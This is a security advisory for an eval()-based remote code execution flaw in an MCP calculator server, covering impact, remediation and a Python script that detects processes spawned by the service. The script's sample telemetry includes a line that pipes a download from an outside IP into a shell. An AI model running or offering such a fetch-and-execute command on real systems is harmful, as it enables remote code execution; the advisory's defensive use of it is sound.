CVE-2026-44717

MCP · Calculate Server

The MCP Calculate Server passes user-supplied mathematical expressions directly to Python's eval() function, allowing unauthenticated remote code execution.

Executive summary

A critical remote code execution vulnerability in the MCP Calculate Server allows unauthenticated attackers to execute arbitrary Python code, and through it arbitrary system commands, by submitting a crafted expression in place of a mathematical one.

Vulnerability

The application passes user-supplied expression text directly to Python's eval() without validation. Because eval() executes any Python expression, not only arithmetic, an unauthenticated attacker who can reach the calculation service can submit an expression that imports modules and spawns processes, obtaining code execution with the privileges of the server process. Input sanitization is not an adequate fix for this pattern: the expression must be parsed and evaluated by a restricted evaluator that accepts only numeric literals and arithmetic operators.

Business impact

Arbitrary code execution on the host running the calculation service poses a critical risk of full system compromise, data theft, and lateral movement within the network. The CVSS score of 9.8 (Critical) reflects the severity of such an exploit: it is reachable over the network, requires no authentication or user interaction, has low attack complexity, and gives full control over the confidentiality, integrity and availability of the affected host. CVSS measures severity, not the likelihood that an exploit occurs.

Remediation

Immediate Action: Update the MCP Calculate Server to version 0.1.1 or later, which removes the unsafe use of eval(). Until the update is applied, do not expose the service to untrusted clients.

Proactive Monitoring: Monitor process-creation telemetry for child processes spawned by the calculation service (for example a shell or download utility whose parent, or ancestor, is the server's Python process). A calculator has no legitimate reason to spawn processes, so any such child is a strong indicator of exploitation.

Compensating Controls: Run the calculation service in a restricted container as an unprivileged user, with a read-only filesystem where possible, no mounted secrets, and no egress network access. These controls limit what an attacker gains from code execution; they do not prevent it.
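As an added example of the monitoring recommendation above (not part of the original advisory), the following Python walks a set of process-creation events and flags every process that descends from the calculation service. The event format, the sample events, and the `mcp_calculate_server` module name used to recognise the service are all constructed for this example and do not correspond to any real EDR or auditd output; adapt the parsing to whatever telemetry source you have. Descendants are checked through the whole parent chain, so a `curl` launched by a shell that the server spawned is still caught.

```python
import json

# Hypothetical marker used to recognise the service process from its argv.
SERVICE_MARKER = "mcp_calculate_server"

# Constructed sample events (one JSON object per line, hypothetical format).
# pid 4100 is the calculation service; 4120/4121 are a shell and a download
# tool it was tricked into spawning; 5000/5001 are an unrelated sshd session.
SAMPLE_EVENTS = """
{"ts": "2026-03-01T10:00:00Z", "pid": 4100, "ppid": 1,    "comm": "python3", "argv": ["python3", "-m", "mcp_calculate_server"]}
{"ts": "2026-03-01T10:00:02Z", "pid": 5000, "ppid": 1,    "comm": "sshd",    "argv": ["sshd: alice [priv]"]}
{"ts": "2026-03-01T10:00:03Z", "pid": 5001, "ppid": 5000, "comm": "bash",    "argv": ["-bash"]}
{"ts": "2026-03-01T10:00:09Z", "pid": 4120, "ppid": 4100, "comm": "sh",      "argv": ["sh", "-c", "curl http://198.51.100.7/x | sh"]}
{"ts": "2026-03-01T10:00:10Z", "pid": 4121, "ppid": 4120, "comm": "curl",    "argv": ["curl", "http://198.51.100.7/x"]}
"""


def parse_events(text: str) -> list:
    """Parse JSON-lines process events; blank lines are ignored."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def service_pids(events: list) -> set:
    """PIDs whose command line identifies them as the calculation service."""
    return {e["pid"] for e in events
            if any(SERVICE_MARKER in arg for arg in e["argv"])}


def descends_from(pid: int, parents: dict, roots: set, max_depth: int = 32) -> bool:
    """True if any ancestor of pid (via the ppid chain) is in roots."""
    depth = 0
    while pid in parents and depth < max_depth:
        pid = parents[pid]
        if pid in roots:
            return True
        depth += 1
    return False


def find_unexpected_children(text: str) -> list:
    """Return (pid, comm, command line) for every process descended from the service.

    The service is not expected to spawn anything, so every descendant is
    reported; if a deployment legitimately forks workers, allow-list them here.
    """
    events = parse_events(text)
    parents = {e["pid"]: e["ppid"] for e in events}
    roots = service_pids(events)
    alerts = []
    for e in events:
        if e["pid"] in roots:
            continue
        if descends_from(e["pid"], parents, roots):
            alerts.append((e["pid"], e["comm"], " ".join(e["argv"])))
    return alerts


if __name__ == "__main__":
    for pid, comm, cmdline in find_unexpected_children(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} comm={comm} cmd={cmdline!r}")
```

Because the check uses the ancestry chain rather than only the immediate parent, it also catches payloads that chain several processes; the trade-off is that a long-running shell spawned once keeps every later grandchild flagged, which is the desired behaviour for a service that should never spawn anything.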

Exploitation status

Public Exploit Available: false

Analyst recommendation

This vulnerability represents an immediate threat to system integrity. Organizations running the MCP Calculate Server should apply the 0.1.1 update as a matter of urgency. The absence of a public exploit is not a mitigation: once the endpoint is identified, an eval()-based expression evaluator needs no specialised tooling to exploit.